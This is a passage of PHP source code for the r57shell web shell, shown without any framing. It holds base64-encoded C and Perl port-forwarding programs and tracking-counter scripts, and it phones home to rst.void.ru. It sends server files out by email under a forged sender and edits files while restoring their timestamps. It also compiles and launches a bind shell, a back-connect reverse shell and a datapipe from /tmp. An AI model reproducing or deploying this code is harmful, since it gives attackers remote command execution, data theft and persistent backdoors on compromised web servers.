1417iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1418KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1419gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1420hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1421iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1422ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1423vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1424AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1425QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1426ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1427gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1428wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
142929jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1430MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1431gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
14325zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1433HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1434dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1435KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1436ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1437E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1438Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1439NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1440J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1441CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1442dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1443gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1444lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1445$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1446CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1447bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1448gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1449NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1450iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1451aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1452SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1453xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1454WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1455CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1456yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1457I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1458m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1459IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1460lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1461QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1462CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1463c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1464NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1465UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1466DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1467ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
14681ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1469$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1470JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1471lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1472FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
14733NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1474J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1475oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1476xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1477i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1478dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1479ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1480hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1481$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1482IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1483hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1484tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1485XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
14868eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1487ybmV0LS0+";
1488if($unix)
1489 {
1490 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
1491 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
1492 if($safe_mode) { $sysctl = '-'; }
1493 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
1494 else
1495 {
1496 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1497 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
1498 if(empty($sysctl)) { $sysctl = '-'; }
1499 setcookie('sysctl',$sysctl);
1500 }
1501 }
1502echo $head;
1503echo '</head>';
1504if(empty($_POST['cmd'])) {
1505$serv = array(127,192,172,10);
1506$addr=@explode('.', $_SERVER['SERVER_ADDR']);
1507$current_version = str_replace('.','',$version);
1508if (!in_array($addr[0], $serv)) {
1509@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1510@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}
1511echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1512echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
1513echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1514echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1515if($unix)
1516 {
1517 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1518 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1519 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
1520 }
1521echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1522echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1523echo ws(2)."safe_mode: <b>";
1524echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1525echo "</b>".ws(2);
1526echo "PHP version: <b>".@phpversion()."</b>";
1527$curl_on = @function_exists('curl_version');
1528echo ws(2);
1529echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1530echo "</b>".ws(2);
1531echo "MySQL: <b>";
1532$mysql_on = @function_exists('mysql_connect');
1533if($mysql_on){
1534echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
1535echo "</b>".ws(2);
1536echo "MSSQL: <b>";
1537$mssql_on = @function_exists('mssql_connect');
1538if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1539echo "</b>".ws(2);
1540echo "PostgreSQL: <b>";
1541$pg_on = @function_exists('pg_connect');
1542if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1543echo "</b>".ws(2);
1544echo "Oracle: <b>";
1545$ora_on = @function_exists('ocilogon');
1546if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1547echo "</b><br>".ws(2);
1548echo "Disable functions : <b>";
1549if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1550$free = @diskfreespace($dir);
1551if (!$free) {$free = 0;}
1552$all = @disk_total_space($dir);
1553if (!$all) {$all = 0;}
1554echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1555echo '</font></td></tr><table>
1556<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1557<tr><td align=right width=100>';
1558echo $font;
1559if($unix){
1560echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1561echo "</td><td>";
1562echo "<font face=Verdana size=-2 color=red><b>";
1563echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1564echo ws(3).$sysctl."<br>";
1565echo ws(3).ex('echo $OSTYPE')."<br>";
1566echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1567if(!empty($id)) { echo ws(3).$id."<br>"; }
1568else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
1569 {
1570 $euserinfo = @posix_getpwuid(@posix_geteuid());
1571 $egroupinfo = @posix_getgrgid(@posix_getegid());
1572 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1573 }
1574else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1575echo ws(3).$dir;
1576echo ws(3).'( '.perms(@fileperms($dir)).' )';
1577echo "</b></font>";
1578}
1579else
1580{
1581echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1582echo "</td><td>";
1583echo "<font face=Verdana size=-2 color=red><b>";
1584echo ws(3).@substr(@php_uname(),0,120)."<br>";
1585echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1586echo ws(3).@getenv("USERNAME")."<br>";
1587echo ws(3).$dir;
1588echo "<br></font>";
1589}
1590echo "</font>";
1591echo "</td></tr></table>";
1592if(empty($c1)||empty($c2)) { die(); }
1593$f = '<br>';
1594$f .= base64_decode($c1);
1595$f .= base64_decode($c2);
1596if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
1597 {
1598 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1599 err(6+$res);
1600 $_POST['cmd']="";
1601 }
1602if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1603 {
1604 if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
1605 else
1606 {
1607 $filename = @basename($_POST['loc_file']);
1608 $filedump = @fread($file,@filesize($_POST['loc_file']));
1609 fclose($file);
1610 $content_encoding=$mime_type='';
1611 compress($filename,$filedump,$_POST['compress']);
1612 $attach = array(
1613 "name"=>$filename,
1614 "type"=>$mime_type,
1615 "content"=>$filedump
1616 );
1617 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1618 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1619 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1620 err(6+$res);
1621 $_POST['cmd']="";
1622 }
1623 }
1624if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1625{
1626$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1627}
1628if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1629 {
1630 switch($_POST['what'])
1631 {
1632 case 'own':
1633 @chown($_POST['param1'],$_POST['param2']);
1634 break;
1635 case 'grp':
1636 @chgrp($_POST['param1'],$_POST['param2']);
1637 break;
1638 case 'mod':
1639 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1640 break;
1641 }
1642 $_POST['cmd']="";
1643 }
1644if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1645 {
1646 switch($_POST['what'])
1647 {
1648 case 'file':
1649 if($_POST['action'] == "create")
1650 {
1651 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1652 else {
1653 fclose($file);
1654 $_POST['e_name'] = $_POST['mk_name'];
1655 $_POST['cmd']="edit_file";
1656 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1657 }
1658 }
1659 else if($_POST['action'] == "delete")
1660 {
1661 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1662 $_POST['cmd']="";
1663 }
1664 break;
1665 case 'dir':
1666 if($_POST['action'] == "create"){
1667 if(mkdir($_POST['mk_name']))
1668 {
1669 $_POST['cmd']="";
1670 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1671 }
1672 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1673 }
1674 else if($_POST['action'] == "delete"){
1675 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1676 $_POST['cmd']="";
1677 }
1678 break;
1679 }
1680 }
1681if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1682 {
1683 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1684 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
1685 else {
1686 echo $table_up3;
1687 echo $font;
1688 echo "<form name=save_file method=post>";
1689 echo ws(3)."<b>".$_POST['e_name']."</b>";
1690 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1691 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1692 fclose($file);
1693 echo "</textarea>";
1694 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1695 echo "<input type=hidden name=dir value=".$dir.">";
1696 echo "<input type=hidden name=cmd value=save_file>";
1697 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1698 echo "</div>";
1699 echo "</font>";
1700 echo "</form>";
1701 echo "</td></tr></table>";
1702 exit();
1703 }
1704 }
1705if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1706 {
1707 $mtime = @filemtime($_POST['e_name']);
1708 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
1709 else {
1710 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1711 @fwrite($file,$_POST['e_text']);
1712 @touch($_POST['e_name'],$mtime,$mtime);
1713 $_POST['cmd']="";
1714 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1715 }
1716 }
1717if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1718{
1719 cf("/tmp/bd.c",$port_bind_bd_c);
1720 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1721 @unlink("/tmp/bd.c");
1722 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1723 $_POST['cmd']="ps -aux | grep bd";
1724}
1725if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1726{
1727 cf("/tmp/bdpl",$port_bind_bd_pl);
1728 $p2=which("perl");
1729 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1730 $_POST['cmd']="ps -aux | grep bdpl";
1731}
1732if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1733{
1734 cf("/tmp/back",$back_connect);
1735 $p2=which("perl");
1736 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1737 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1738}
1739if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1740{
1741 cf("/tmp/back.c",$back_connect_c);
1742 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1743 @unlink("/tmp/back.c");
1744 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1745 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1746}
1747if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1748{
1749 cf("/tmp/dp",$datapipe_pl);
1750 $p2=which("perl");
1751 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1752 $_POST['cmd']="ps -aux | grep dp";
1753}
1754if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1755{
1756 cf("/tmp/dpc.c",$datapipe_c);
1757 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1758 @unlink("/tmp/dpc.c");
1759 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1760 $_POST['cmd']="ps -aux | grep dpc";
1761}
1762if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
1763if (!empty($HTTP_POST_FILES['userfile']['name']))
1764{
1765if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
